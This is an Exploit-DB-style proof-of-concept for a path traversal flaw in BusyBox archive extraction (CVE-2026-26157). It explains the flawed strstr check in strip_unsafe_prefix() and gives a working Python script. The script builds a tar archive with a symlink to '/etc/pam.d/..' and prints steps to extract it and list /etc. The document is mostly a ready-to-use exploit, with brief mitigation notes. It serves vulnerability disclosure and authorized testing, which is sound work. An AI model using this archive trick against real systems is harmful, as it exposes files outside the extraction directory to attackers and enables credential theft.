# Exploit Title: BusyBox 1.37.0 - Path Traversal 
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157

"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)

Description:
BusyBox archive extraction utilities fail to properly sanitize symlink targets
containing trailing ".." components. The strip_unsafe_prefix() function in
archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
the 4-character pattern and misses 3-character trailing "/.." sequences.

This allows an attacker to craft malicious archives with symlinks pointing to
arbitrary filesystem locations, enabling information disclosure through symlink
traversal.

Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar

Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft

Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
  cp2 = strstr(cp, "/../");  // Only matches "/../", misses "/pam.d/.."
  if (!cp2) break;

Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents

References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""

import tarfile
import sys
import os

def create_exploit():
    """
    Creates a malicious TAR file exploiting CVE-2026-26157.
    
    The archive contains a symlink with an unsanitized target that
    resolves outside the extraction directory.
    """
    
    exploit_file = 'CVE-2026-26157_exploit.tar'
    
    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # Create symlink with trailing ".." in target path
            # This bypasses strip_unsafe_prefix() pattern matching
            info = tarfile.TarInfo('sensitive_data')
            info.type = tarfile.SYMTYPE
            info.linkname = '/etc/pam.d/..'  # Resolves to /etc
            tar.addfile(info)
        
        print(f"[+] Exploit created: {exploit_file}")
        print(f"\n[*] Exploitation steps:")
        print(f"  1. mkdir test_extraction && cd test_extraction")
        print(f"  2. busybox tar xf ../{exploit_file}")
        print(f"  3. readlink -f sensitive_data")
        print(f"     Expected output: /etc")
        print(f"  4. ls sensitive_data/")
        print(f"     Result: Lists /etc directory contents")
        print(f"\n[!] Impact: Arbitrary directory read via symlink traversal")
        print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
        
        return exploit_file
        
    except Exception as e:
        print(f"[-] Error creating exploit: {e}")
        sys.exit(1)

def show_technical_details():
    """Display technical analysis of the vulnerability"""
    
    print("\n" + "="*70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("="*70)
    print("\nVulnerable Function:")
    print("  archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
    print("\nVulnerable Code Pattern:")
    print("  cp2 = strstr(cp, \"/../\");  // Only matches 4-char sequence")
    print("  if (!cp2) break;")
    print("\nBypass Technique:")
    print("  Path: /etc/pam.d/..")
    print("  Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
    print("  Result: Sanitization bypassed, symlink created with original target")
    print("\nExploitation Flow:")
    print("  1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print("  2. get_header_tar() extracts symlink metadata")
    print("  3. Symlink target NOT sanitized (bypass detected)")
    print("  4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print("  5. Target resolves: /etc/pam.d/.. -> /etc")
    print("  6. Reading 'sensitive_data' = reading /etc")
    print("="*70 + "\n")

if __name__ == "__main__":
    print("="*70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("="*70)
    
    # Display technical analysis
    show_technical_details()
    
    # Create exploit
    exploit_file = create_exploit()
    
    print("\n[*] Mitigation:")
    print("  - Update BusyBox to patched version")
    print("  - Patch applies strip_unsafe_prefix() to symlink targets")
    print("  - Do not extract untrusted archives with elevated privileges")
    
    print("\n[*] For educational and authorized testing purposes only")